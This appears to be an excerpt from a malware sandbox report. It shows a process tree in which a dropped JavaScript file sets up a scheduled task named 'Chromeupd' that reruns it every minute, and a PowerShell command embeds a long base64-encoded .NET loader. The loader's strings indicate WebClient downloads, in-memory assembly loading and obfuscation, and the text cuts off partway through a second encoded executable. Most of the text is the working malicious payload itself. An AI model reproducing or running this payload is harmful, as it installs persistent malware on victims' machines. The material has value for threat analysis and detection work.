C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn Chromeupd /f
  2⤵
  PID:3416
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn Chromeupd /tr "C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js" /sc minute /mo 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $bFjDJ = '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cHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBHdWlkQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAVG9TdHJpbmcAR2V0Rm9sZGVyUGF0aABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAQ2xhc3NMaWJyYXJ5My5kbGwAc2V0X1NlY3VyaXR5UHJvdG9jb2wAU3lzdGVtAFRyaW0AQm9vbGVhbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AVmVyc2lvbgBTeXN0ZW0uQ29uZmlndXJhdGlvbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBJbnRlcmFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBsaXhvbwBsaXhvAFNwZWNpYWxGb2xkZXIAUmVzb3VyY2VNYW5hZ2VyAFNlcnZpY2VQb2ludE1hbmFnZXIAVXNlcgBDb21wdXRlcgBUb0xvd2VyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5EZXZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5BcHBsaWNhdGlvblNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMAQ2xhc3NMaWJyYXJ5My5SZXNvdXJjZXMucmVzb3VyY2VzAFN0cmluZ3MAUmVmZXJlbmNlRXF1YWxzAENvbnRhaW5zAFJ1bnRpbWVIZWxwZXJzAENvbmNhdABDcmVhdGVPYmplY3QAR2V0T2JqZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AFdlYkNsaWVudABFbnZpcm9ubWVudABDb252ZXJ0AFN5c3RlbS5UZXh0AGdldF9Bc3NlbWJseQBFbXB0eQAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAG0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEAAAVqAHMAAAcuAGoAcwAAAzMAABtXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAAABAB1DAHIAZQBhAHQAZQBTAGgAbwByAHQAYwB1AHQAAANcAAAJLgBsAG4AawAAFVQAYQByAGcAZQB0AFAAYQB0AGgAABlJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAAIWkAbQBhAGcAZQByAGUAcwAuAGQAbABsACwAIAAyADcAABdXAGkAbgBkAG8AdwBTAHQAeQBsAGUAAAlTAGEAdgBlAABFawByAG8AdwBlAG0AYQByAEYAXABUAEUATgAuAHQAZgBvAHMAbwByAGMAaQBNAFwAcwB3AG8A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